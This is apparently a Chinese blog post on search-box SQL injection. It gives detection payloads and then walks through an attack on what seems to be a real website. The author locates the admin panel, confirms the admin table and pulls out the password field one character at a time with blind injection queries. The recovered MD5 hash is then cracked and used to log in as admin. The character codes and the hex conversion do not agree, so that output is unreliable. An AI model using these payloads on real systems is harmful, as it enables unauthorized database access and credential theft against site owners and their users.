搜索框注入

               

如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊
曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是中国第三代黑客基本山都是在校大学生了。
经过N多人是使用阿D和明小子,现在很明显的注入漏洞已经很少了。记得有个人说的比较对,要是没有中国的“黑客”的努力,中国的网络安全发展的不会这么快,其实这句话说的不无道理。
跑题了................
说到注入,最根本的原因是程序员在写程序的时候没有把数字和字符过滤严格,所以只要是涉及到注入就要联系到 and 1=1 and 1=2经典的判断语句,不过搜索型注入也是在普通SQL基础上的一个升华
判断搜索型注入的方法:
1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;
2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;
3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况
4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况
5 根据两次的返回情况来判断是不是搜索型文本框注入了
后面就是手工注入了,和普通的SQL注入是一样的了...
手工注入还是先判断一下数据库类型,如果是MSSQL,就可以使用 order by/union/concat/update/等关键词来提高工作效率
如果是ACCESS的话,就是苦力活了,一个一个猜吧

 

首先判断注入点,在查询关键字那里输入:4%' and 1=1 and '%' ='    返回正常,没报错,

然后输入:4%' and 1=2 and '%' ='  报错了,说明这个地方是存在注入点的。
这个是post的方式的,抓包之后,本来打算用工具来跑的,试了一下,没检测出来,我就用手工来慢慢检测吧。
我没有马上查表名,而是去看了看后台,直接在域名后面加上admin成功爆出后台,找到后台后看了一下这个后台的源文件。

好了,我们先来查询一下表名吧,在搜索框里输入:%'and(select count(*)from admin)>0 and '%'='     返回正常,说明这个admin表存在。

我再来查看一下字段吧,从刚才查看那个后台的源文件得知有psw这个字段,查询字段:
4%'and(select top 1 len(psw)from admin) and '%'='  返回正常。

现在重点来了,我们查一下它里面的内容吧
4%'and(select top 1 asc(mid(psw,1,1))from admin)>54 and '%'='  
4%'and(select top 1 asc(mid(psw,2,1))from admin)>49 and '%'='  
4%'and(select top 1 asc(mid(psw,3,1))from admin)>54 and '%'='  
4%'and(select top 1 asc(mid(psw,4,1))from admin)>96 and '%'='  
4%'and(select top 1 asc(mid(psw,5,1))from admin)>100 and '%'='
4%'and(select top 1 asc(mid(psw,6,1))from admin)>98 and '%'='  
4%'and(select top 1 asc(mid(psw,7,1))from admin)>48 and '%'='  
4%'and(select top 1 asc(mid(psw,8,1))from admin)>97 and '%'='  
4%'and(select top 1 asc(mid(psw,9,1))from admin)>96 and '%'='  
4%'and(select top 1 asc(mid(psw,10,1))from admin)>53 and '%'='
4%'and(select top 1 asc(mid(psw,11,1))from admin)>99 and '%'='
4%'and(select top 1 asc(mid(psw,12,1))from admin)>55 and '%'='
4%'and(select top 1 asc(mid(psw,13,1))from admin)>100 and '%'='
4%'and(select top 1 asc(mid(psw,14,1))from admin)>49 and '%'='  
4%'and(select top 1 asc(mid(psw,15,1))from admin)>51 and '%'='   
4%'and(select top 1 asc(mid(psw,16,1))from admin)>56 and '%'='   
手工注入就是麻烦,通过我慢慢的检测,成功爆出了相应的值:
55 50 55 97 101 99 49 98 97 54 96 56 101 50 52 57
用转换工具转换了一下得出:727aec1ba6d8e249 (md5值)
解密之后就是:101010
我试了一下用户名admin果然正确,登录后台。

 

           

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值